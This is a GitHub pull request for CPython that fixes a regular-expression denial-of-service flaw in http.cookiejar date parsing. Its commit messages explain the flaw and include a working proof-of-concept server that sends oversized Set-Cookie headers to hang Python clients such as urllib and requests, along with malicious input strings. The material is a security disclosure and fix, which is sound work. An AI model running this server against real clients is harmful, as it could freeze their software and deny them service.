Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

bpo-38804: Fix REDoS in http.cookiejar #17157

Merged
merged 6 commits into from Nov 22, 2019

Commits on Nov 14, 2019

  1. bpo-38804: Fix REDoS in http.cookiejar

    The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
    expression denial of service (REDoS).
    LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
    to parse Set-Cookie headers returned by a server.
    Processing a response from a malicious HTTP server can lead to extreme
    CPU usage and execution will be blocked for a long time.
    
    The regex contained multiple overlapping \s* capture groups.
    Ignoring the ?-optional capture groups the regex could be simplified to
    
        \d+-\w+-\d+(\s*\s*\s*)$
    
    Therefore, a long sequence of spaces can trigger bad performance.
    
    Matching a malicious string such as
    
        LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")
    
    caused catastrophic backtracking.
    
    The fix removes ambiguity about which \s* should match a particular
    space.
    
    You can create a malicious server which responds with Set-Cookie headers
    to attack all python programs which access it e.g.
    
        from http.server import BaseHTTPRequestHandler, HTTPServer
    
        def make_set_cookie_value(n_spaces):
            spaces = " " * n_spaces
            expiry = f"1-c-1{spaces}!"
            return f"b;Expires={expiry}"
    
        class Handler(BaseHTTPRequestHandler):
            def do_GET(self):
                self.log_request(204)
                self.send_response_only(204)  # Don't bother sending Server and Date
                n_spaces = (
                    int(self.path[1:])  # Can GET e.g. /100 to test shorter sequences
                    if len(self.path) > 1 else
                    65506  # Max header line length 65536
                )
                value = make_set_cookie_value(n_spaces)
                for i in range(99):  # Not necessary, but we can have up to 100 header lines
                    self.send_header("Set-Cookie", value)
                self.end_headers()
    
        if __name__ == "__main__":
            HTTPServer(("", 44020), Handler).serve_forever()
    
    This server returns 99 Set-Cookie headers. Each has 65506 spaces.
    Extracting the cookies will pretty much never complete.
    
    Vulnerable client using the example at the bottom of
    https://docs.python.org/3/library/http.cookiejar.html :
    
        import http.cookiejar, urllib.request
        cj = http.cookiejar.CookieJar()
        opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
        r = opener.open("http://localhost:44020/")
    
    The popular requests library was also vulnerable without any additional
    options (as it uses http.cookiejar by default):
    
        import requests
        requests.get("http://localhost:44020/")
    bcaller committed Nov 14, 2019

Commits on Nov 15, 2019

  1. Regression test for http.cookiejar REDoS

    If we regress, this test will take a very long time.
    bcaller committed Nov 15, 2019
  2. Improve performance of http.cookiejar.ISO_DATE_RE

    A string like
    
    "444444" + (" " * 2000) + "A"
    
    could cause poor performance due to the 2 overlapping \s* groups,
    although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.
    bcaller committed Nov 15, 2019

Commits on Nov 16, 2019

  1. Update News / Acks

    Co-Authored-By: Serhiy Storchaka <storchaka@gmail.com>
    bcaller and serhiy-storchaka committed Nov 16, 2019